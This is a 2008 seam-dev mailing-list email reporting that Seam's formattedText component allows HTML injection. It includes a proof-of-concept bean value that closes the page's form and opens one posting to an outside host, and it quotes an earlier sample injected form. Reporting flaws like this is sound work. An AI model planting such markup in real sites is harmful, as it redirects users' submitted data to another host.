Please consider the following example:
<html
xmlns:h="http://java.sun.com/jsf/html"
xmlns:f="http://java.sun.com/jsf/core"
xmlns:ui="http://java.sun.com/jsf/facelets"
xmlns:rich="http://richfaces.org/rich"
xmlns:s="http://jboss.com/products/seam/taglib">
<body>
<h:form id="Form">
<s:formattedText value="#{bean.seamText}"/>
<h:commandButton value="Submit!"/>
</h:form>
</body>
</html>
bean.seamText =>
public String getSeamText() {
return "<br></form><form
action=\"http://www.jboss.org\"></br>";
}
Pressing "Submit!" command button will submit form to
jboss.org instead of
the application host, so one can potentially spy other users.
Tested with Seam 2.1.0.beta1.
Best regards,
Nick Belaevski
-----Original Message-----
From: Christian Bauer [mailto:cbauer@redhat.com]
Sent: Thursday, October 02, 2008 7:56 PM
To: Nick Belaevski
Cc: seam-dev(a)lists.jboss.org; Ilya Shaikovsky; Sergey Smirnov
Subject: Re: Form, Input Elements and SeamText
On Oct 02, 2008, at 18:50 , Nick Belaevski wrote:
> <form action="http://somesite.com"><input type="file"
/><input
> type="submit" /></form>
>
> I suppose it is not safe that the user is possible to type in forms.
Why not? Your browser can send whatever forms it wants to whatever site.